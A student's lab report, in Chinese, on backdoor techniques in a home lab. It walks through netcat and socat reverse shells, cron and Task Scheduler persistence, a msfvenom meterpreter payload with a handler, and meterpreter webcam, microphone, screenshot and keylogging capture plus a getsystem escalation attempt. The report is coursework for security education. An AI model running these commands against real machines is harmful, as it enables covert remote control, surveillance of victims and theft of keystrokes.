20164319 刘蕴哲 Exp2 后门原理与实践
【后门概念】
后门就是不经过正常认证流程而访问系统的通道。
特指潜伏于操作系统中专门做后门的一个程序,而“坏人”可以连接这个程序远程执行各种指令。
(概念和木马有重叠)
【学习内容】
使用nc实现win,mac,Linux间的后门连接
meterpreter的应用
MSF POST 模块的应用
【实验内容】
[首先得有这么一个程序]
NC 或 netcat
得放到系统里
还得运行起来
最后还得不被本机的恶意代码检测程序发现,也不能被本机的或网络上的防火墙发现
所以按照以上步骤将实验分为以下几步:
[part1]使用nc或netcat远程获取shell
①win获得Linux shell
在windows系统中打开监听并且获得Linux Shell
在windows系统中打开cmd命令行窗口,键入
ipconfig
查询windows的IP地址为"192.168.75.1"
然后将之前下载的监听程序ncat.exe解压在桌面上,进入命令行,cd进入桌面Desktop,输入指令
ncat.exe -l -p 4319
监听端口4319,等待其他机器连接。
然后在kali中用windows的ip和连接端口号反弹连接,给出shell权限:
nc 192.168.75.1 4319 -e /bin/sh
这样,获得执行权限的windows就可以执行linux相关命令"ls"
②Linux获得Windows Shell
在kali中键入命令
ifconfig
查询linux系统的IP地址为192.168.64.134,然后在linux中用nc命令直接设置监听本地4319端口(Linux一般自带netcat)
nc -l -p 4319
在windows系统的命令行窗口中利用linux的ip反弹连接,提供自己的shell:
ncat.exe -e cmd.exe 192.168.64.134 4319
同理,切换到linux下看到Windows的命令提示,获得windows的shell,可执行指令"dir"
③nc传输数据
用windows监听端口4319
ncat.exe -l 4319
同时kali连接win7的4319端口
nc 192.168.75.1 4319
然后传输通道建立,可以在windows和linux系统之间通过窗口进行"对话"(传输信息的复制)
(这是linux界面)
(这是windows界面)
[part2]利用netcat获取主机shell,设置cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
在windows系统监听端口
ncat.exe -l -p 4319
使用crontab指令增加一条定时任务
crontab -e
然后输入“3”进入编辑模式
在最后添加一条定时连接win端口的指令
45 * * * * /bin/netcat 192.16875.1. 4319 -e /bin/sh
当前时间为43分,为了方便测试我设置成离得近的时间节点——每小时的第45分钟,连接IP为192.168.75.1的4319端口
crontab -l
可查看配置的任务如下
然后在windows系统下调出cmd,测试到了45分时,成功获取linux的shell,执行“ls”命令
(呃,忘记截时间了,没关系哈哈哈,反正是到了45分就能执行ls命令)
[part3]使用socat获取主机操作Shell, 任务计划启动
在Windows系统下,打开控制面板搜索“任务计划程序”,然后在右侧菜单栏中选择“创建任务”,任务名称“4319”,新建触发器,选择开始任务时间为:工作站锁定时。
新建操作,选择启动的程序为socat.exe,参数项填为
tcp-listen:4319 exec:cmd.exe,pty,stderr
然后锁定计算机,打开后查看程序运行状态(这里我的锁定之后没有自动运行,我是手动点运行来启动的)
在kali终端输入
socat - tcp:192.168.75.1:4319
[part4]使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在linux端生成后门程序4319_backdoor.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.134 LPORT=4319 -f exe > 4319_backdoor.exe
通过nc指令将生成的后门程序传送到Windows主机上,并运行ncat命令,等待接收后门程序4319_backdoor.exe
ncat.exe -lv 4319 > 4319_backdoor.exe
kali上运行ncat命令,传输4319_backdoor.exe到windows主机上
nc 192.168.75.1 4319 < 4319_backdoor.exe
在win端命令行显示传输成功
确实传输了一个后门程序在桌面上(我也不知道为什么没传进文件夹里???)
在msf端控制台设置反弹回连,在kali上输入指令进入msf控制台
msfconsole
(follow the white rabbit哈哈哈还挺有意思)
然后就开始干正事了(严肃)
配置payload,设置如下
use exploit/multi/handler //使用handler模块
set payload windows/meterpreter/reverse_tcp //设置载荷,字面意思应该是基于TCP的反向连接反弹windows shell
show options //查看利用模块的设置信息
set LHOST 192.168.64.134 //接下来的两个set是配置模块的设置信息,这里是设置本主机kali的IP
set LPORT 4319 //设置本主机的端口
show options //再次查看一下options,确保设置正确
exploit //运行模块
首先配置模块、载荷并查看
此时端口和ip还未设置,“required”选项下为“yes”的表示需要设置,所以接下来我们设置主机IP(设置为linux的ip)、端口
再次查看确认
show options
确认无误,可以放心进行下一步啦!启用模块
第一次启用模块出了点问题,怀疑是我传输到桌面的后台程序没启用,在windows端上用控制台cmd运行一下
这下知道了,是后台程序被占用了,应该是上一次实验调用该程序的控制台窗口没关闭,关掉再试一下
这下成功了,切换到linux端,发现成功获得了windows的连接,并且得到了远程控制的shell,可执行相关命令
(可以看到我桌面上的文件全部都能显示出来,真可怕)
[part5]使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
由上面的exploit操作,已经获得shell,接下来,尝试获取目标主机音频、摄像头、击键记录等内容
①获取目标主机音频、截屏内容
record_mic //音频
screenshot //截屏
成功获取文件之后可以在文件主目录中看到
②获取摄像头所拍摄相片(第一次没开启摄像头,拍了个全黑的,调好了就能连接上摄像头了)
(还好有前车之鉴,把脸挡住了)
③获取击键记录
keyscan_start
在win7上用键盘输入之后
在kali上输入指令可获取击键记录
keyscan_dump
④提权
看当前用户
getuid
然后进行提权
getsystem
然而提权失败了(发现原来是需要以管理员身份运行后门程序4319_backdoor.exe)
捣鼓了好几遍
总算好了
【实验感悟】
通过本次实验,除了使我认识到了后台程序的基本运作原理和机制之外,还令我深切体会到了后台程序的可怕,可以获取shell权限,监听受控主机的摄像头和音频设备,甚至获取击键记录(看来以后要增强安全防护意识)。最后,总结一下实验过程中出现的很多问题,因为实验涉及两个终端和系统来回切换,导致我开了一堆后台程序(想关又不敢关),有的窗口关错了可能就导致后台程序调用失败,或者重复占用导致无法获取shell的情况,经过反复总结之后发现我以后面对这种情况还是要灵活应对,冷静分析问题。最后获取权限的时候也出了一堆问题,试了好几遍都没成功,然后不知道试了几遍之后莫名其妙就成功了....(说起来最有意思的部分还是获取音频截屏和摄像头权限了)整体上来看本次实验让我对后台软件4319_backdoor.exe的能实现的操作,做了深入的了解和掌握,包括怎么植入程序,怎么获取shell权限,怎么进入console配置ip和端口,用指令调取权限。
